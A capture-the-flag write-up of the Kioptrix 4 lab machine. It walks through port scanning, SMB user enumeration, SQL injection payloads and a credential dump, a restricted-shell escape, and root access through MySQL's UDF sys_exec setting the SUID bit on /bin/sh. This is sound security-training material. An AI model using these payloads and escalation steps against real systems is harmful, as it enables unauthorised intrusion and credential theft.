Machine Information
- Kioptrix 4
- Author:
Kioptrix
Host discovery
Since IP address is not given, I used nmap to scan for my network and found the target IP.
- target IP:
192.168.188.137
Information Gathering
I always start with nmap when it comes to this kind of challenge.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
nmap -p- -T4 192.168.188.137 -A -oA 192.168.188.137
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-25 21:08 +08
Nmap scan report for 192.168.188.137
Host is up (0.0027s latency).
Not shown: 39528 closed tcp ports (reset), 26003 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:E5:04:7B (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
| OS: Unix (Samba 3.0.28a)
| Computer name: Kioptrix4
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: Kioptrix4.localdomain
|_ System time: 2024-01-25T08:09:25-05:00
|_clock-skew: mean: 2h30m00s, deviation: 3h32m08s, median: 0s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
TRACEROUTE
HOP RTT ADDRESS
1 2.72 ms 192.168.188.137
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.65 seconds
Exploitng port 139 & 445
Since this port is open, I tried to get some info from it.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
nmap -p 139,445 192.168.188.137 --script=smb-enum-users
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-25 23:00 +08
Nmap scan report for 192.168.188.137
Host is up (0.00098s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:E5:04:7B (VMware)
Host script results:
| smb-enum-users:
| KIOPTRIX4\john (RID: 3002)
| Full name: ,,,
| Flags: Normal user account
| KIOPTRIX4\loneferret (RID: 3000)
| Full name: loneferret,,,
| Flags: Normal user account
| KIOPTRIX4\nobody (RID: 501)
| Full name: nobody
| Flags: Normal user account
| KIOPTRIX4\robert (RID: 3004)
| Full name: ,,,
| Flags: Normal user account
| KIOPTRIX4\root (RID: 1000)
| Full name: root
|_ Flags: Normal user account
Nmap done: 1 IP address (1 host up) scanned in 0.52 seconds
After looking around, the only useful things that I managed to get is 5 usernames. I tried to access their smb server but there’s no luck. With that, I proceed with port 80.
Exploiting port 80
I started out by going through their website and it is a member login page.
Since it is a login page, I tried to login by trying a few methods. After trying out a few methods, I managed to login by performing SQL injection.
Although we managed to login, We could not get any useful information out of it. Since it is vulnerable to SQL injection, we could dump the database using sqlmap.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Parameter: mypassword (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: myusername=qDRT&mypassword=-2986' OR 8863=8863#&Submit=Login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: myusername=qDRT&mypassword=HMFk' AND (SELECT 9208 FROM (SELECT(SLEEP(5)))Tspw)-- YxFk&Submit=Login
Table: members
[2 entries]
+----+-----------------------+----------+
| id | password | username |
+----+-----------------------+----------+
| 1 | MyNameIsJohn | john |
| 2 | ADGAdsafdfwt4gadfga== | robert |
+----+-----------------------+----------+
sqlmap successfully retrieve 2 credentials which is useful. I tried to login with both the credentials but sadly there’s nothing else in the website. The credentials might be able to login others as well such as SSH.
Exploiting port 22
I managed to login into their ssh by using john credentials
1
2
3
4
5
6
7
8
ssh john@192.168.188.137 -oHostKeyAlgorithms=+ssh-dss
john@192.168.188.137's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ ?
cd clear echo exit help ll lpath ls
Although I managed to get a shell, it is a restricted shell where I could only perform several commands. Since it is a restricted shell, I tried to look for methods where I could escape it.
1
2
3
4
5
6
7
8
9
10
11
12
john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ ls -la
total 28
drwxr-xr-x 2 john john 4096 2012-02-04 18:39 .
drwxr-xr-x 5 root root 4096 2012-02-04 18:05 ..
-rw------- 1 john john 61 2012-02-04 23:31 .bash_history
-rw-r--r-- 1 john john 220 2012-02-04 18:04 .bash_logout
-rw-r--r-- 1 john john 2940 2012-02-04 18:04 .bashrc
-rw-r--r-- 1 john john 306 2024-01-25 09:18 .lhistory
-rw-r--r-- 1 john john 586 2012-02-04 18:04 .profile
john@Kioptrix4:~$ whoami
john
Now that I managed to escape the restricted shell, I could proceed with privilege escalation to get root account.
Privilege Escalation
To perform privilege escalation, It is good to use linpeas.sh as it will automatic perform various scan with just a single script. After searching around, I remember that the website is running SQL and it might leads to privilege escalation.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
john@Kioptrix4:/home$ cat /var/www/checklogin.php
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name
// Connect to server and select databse.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");
// Define $myusername and $mypassword
$myusername=$_POST['myusername'];
$mypassword=$_POST['mypassword'];
// To protect MySQL injection (more detail about MySQL injection)
$myusername = stripslashes($myusername);
//$mypassword = stripslashes($mypassword);
$myusername = mysql_real_escape_string($myusername);
//$mypassword = mysql_real_escape_string($mypassword);
//$sql="SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'";
$result=mysql_query("SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'");
//$result=mysql_query($sql);
// Mysql_num_row is counting table row
$count=mysql_num_rows($result);
// If result matched $myusername and $mypassword, table row must be 1 row
if($count!=0){
// Register $myusername, $mypassword and redirect to file "login_success.php"
session_register("myusername");
session_register("mypassword");
header("location:login_success.php?username=$myusername");
}
else {
echo "Wrong Username or Password";
print('<form method="link" action="index.php"><input type=submit value="Try Again"></form>');
}
ob_end_flush();
?>
After looking into the files, the username to login MYSQL is root and there is no password.
1
2
3
4
5
6
7
8
9
10
john@Kioptrix4:/home$ mysql -u root
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 8614
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> exit
Bye
Based on the result, it is confirmed that MYSQL could be login with user root and without password. After researching related to MYSQL, it is possible to perform privilege escalation and get root account if there’s a module named UDF (User-Defined Function). I tried to look and see if UDF is installed in the system.
1
2
3
4
5
6
7
8
9
john@Kioptrix4:/home$ find / -name *udf* 2>/dev/null
/usr/lib/lib_mysqludf_sys.so
/usr/share/mysql/mysql-test/r/udf.result
/usr/share/mysql/mysql-test/r/have_udf_example.require
/usr/share/mysql/mysql-test/r/have_udf.require
/usr/share/mysql/mysql-test/t/udf.test
/usr/share/mysql/mysql-test/include/have_udf.inc
/lib/modules/2.6.24-24-server/kernel/fs/udf
/lib/modules/2.6.24-24-server/kernel/fs/udf/udf.ko
It is confirmed that UDF is installed in the system. This means that the privilege escalation method should be abusing UDF in MYSQL.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
john@Kioptrix4:/home$ mysql -u root
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 8615
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> select * from mysql.func;
+-----------------------+-----+---------------------+----------+
| name | ret | dl | type |
+-----------------------+-----+---------------------+----------+
| lib_mysqludf_sys_info | 0 | lib_mysqludf_sys.so | function |
| sys_exec | 0 | lib_mysqludf_sys.so | function |
+-----------------------+-----+---------------------+----------+
2 rows in set (0.00 sec)
Based on the function, there is a sys_exec function in it. Since the name is sys_exec, I tried to run it by executing command and modify some file.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
mysql> select sys_exec('id');
+----------------+
| sys_exec('id') |
+----------------+
| NULL |
+----------------+
1 row in set (0.00 sec)
mysql> select sys_exec('chmod +s /bin/sh');
+------------------------------+
| sys_exec('chmod +s /bin/sh') |
+------------------------------+
| NULL |
+------------------------------+
1 row in set (0.00 sec)
Performing commands like id does not provide any output. The other way to identify is to just change the file type. The command that I run is to set a suid binary to /bin/sh so that I could just get root if it works.
1
2
3
4
john@Kioptrix4:/home$ ls -la /bin/sh
lrwxrwxrwx 1 root root 4 2012-02-04 09:51 /bin/sh -> dash
john@Kioptrix4:/home$ ls -la /bin/dash
-rwsr-sr-x 1 root root 79988 2009-03-09 09:03 /bin/dash
/bin/sh in this case is a symlink to dash and dash now has suid binary in it’s executable. With that, we could just get root account by running the command.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
john@Kioptrix4:/home$ dash
# whoami
root
# cat /root/congrats.txt
Congratulations!
You've got root.
There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.
It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.
If you haven't already, check out the other VMs available on:
www.kioptrix.com
Thanks for playing,
loneferret
While dash directly gave me root account, bash on the other hand do not give me root account if I perform the same method. I need to run bash -p just to get root account.
Things I learned from the machine
- Privilege Escalation with UDF
- Escape restricted shell